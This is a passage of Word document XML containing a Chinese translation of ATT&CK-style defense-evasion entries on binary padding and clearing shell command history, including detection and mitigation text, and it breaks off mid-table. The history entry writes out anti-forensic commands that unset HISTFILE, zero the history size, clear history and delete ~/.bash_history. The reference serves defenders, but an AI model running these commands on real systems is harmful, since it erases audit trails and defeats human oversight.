        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121F903F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="001D4B4B" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D4B4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>此技术滥用</w:t>
      </w:r>
      <w:r w:rsidRPr="001D4B4B">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> macOS </w:t>
      </w:r>
      <w:r w:rsidRPr="001D4B4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="001D4B4B">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r w:rsidRPr="001D4B4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>系统中的正常功能，但</w:t>
      </w:r>
      <w:r w:rsidRPr="001D4B4B">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudo </w:t>
      </w:r>
      <w:r w:rsidRPr="001D4B4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>能够基于</w:t>
      </w:r>
      <w:r w:rsidRPr="001D4B4B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>/etc/sudoers</w:t>
      </w:r>
      <w:r w:rsidRPr="001D4B4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>文件中的</w:t>
      </w:r>
      <w:r w:rsidRPr="001D4B4B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>LOG_INPUT</w:t>
      </w:r>
      <w:r w:rsidRPr="001D4B4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="001D4B4B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>LOG_OUTPUT</w:t>
      </w:r>
      <w:r w:rsidRPr="001D4B4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>指令记录所有输入和输出</w:t>
      </w:r>
      <w:r w:rsidRPr="001D4B4B">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FED7509" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00C87C58" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:spacing w:after="312"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33AFC44B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="000F2665" w:rsidSect="00D7725A">
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1080" w:bottom="1440" w:left="1080" w:header="567" w:footer="567" w:gutter="0"/>
          <w:cols w:space="425"/>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F5E5480" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r w:rsidRPr="00941A4A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>防御逃逸</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DC6814" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00941A4A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二进制填充</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="38C5AB72" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="229175E0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CD15A3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CD15A3">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD15A3">
              <w:t xml:space="preserve"> T1009</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4163C51A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CD15A3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD15A3">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD15A3">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD15A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B8D5AAA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CD15A3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CD15A3">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD15A3">
              <w:t xml:space="preserve"> Linux, macOS, Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68DBF03D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CD15A3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CD15A3">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD15A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>二进制文件元数据，文件监控，恶意代码逆向工程</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="589C551C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CD15A3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>绕过的防御</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD15A3">
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD15A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>基于签名的检测，防病毒</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="007A042B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CD15A3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CD15A3">
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD15A3">
              <w:t>编号</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD15A3">
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:hyperlink r:id="rId102" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00CD15A3">
                <w:t>CAPEC-572</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="63FE95CC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CD15A3">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD15A3">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="124F0EC8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DF6C460" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CD15A3" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD15A3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>某些安全工具使用静态签名检查文件，以确定这些文件是否已知为恶意文件。攻击者可能会向文件添加数据，以超出安全工具能够处理的大小，或者更改文件哈希以避免基于哈希的黑名单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED8A024" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57847C4A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CD15A3" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD15A3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>这种类型的攻击技术无法通过预防性控制轻松缓解，因为它基于系统功能的滥用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A0FC6D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B009766" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CD15A3" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD15A3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>根据用于填充文件的方法，基于文件的签名可能能够使用扫描或基于访问的工具检测填充。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BCE791" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CD15A3" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD15A3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>执行时，填充文件生成的过程也可能表现出用于进行入侵的其他行为特征，例如系统和网络信息发现或横向移动，这些特征可用作指向源文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0C7267" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>清除命令历史</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="44E13FE5" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A8DB342" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1146</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1922BCA7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64AC05B1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36634BE4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:lastRenderedPageBreak/>
              <w:t>所需权限：用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A633595" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>认证</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>日志，文件监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B0B611B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>绕过的防御：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>日志</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>分析，主机取证分析</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E9929B1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="105D10CE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D5A75CB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ac</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>OS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>inux</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都会跟踪用户在终端中键入的命令，这样用户就可以很容易记住他们所做的事情。这些日志可以通过几种不同的方式访问。登录后，此命令历史在环境变量</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HISTFILE</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指向的文件中跟踪。用户退出系统时，此信息将刷新到用户家目录</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>~/.bash_history</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下的文件中。这样做的好处是，用户可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>返</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>回到以前在不同会话中使用过的命令。命令行中键入的所有内容都被保存。同样地</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在命令行中传入的密码也会被保存。攻击者可能会在这些文件中搜索明文密码来实施</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>攻击。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此外，攻击者可能会想方设法来防止自己使用的命令出现在这些日志中，例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>unset HISTFILE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>export HISTFILESIZE=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>history -c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>rm ~/.bash_history</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7265C71B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2294"/>
        <w:gridCol w:w="7442"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00AF6363" w14:paraId="620A5DD1" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="45945942" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="67311BF4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="213D6559" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42BE16A2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
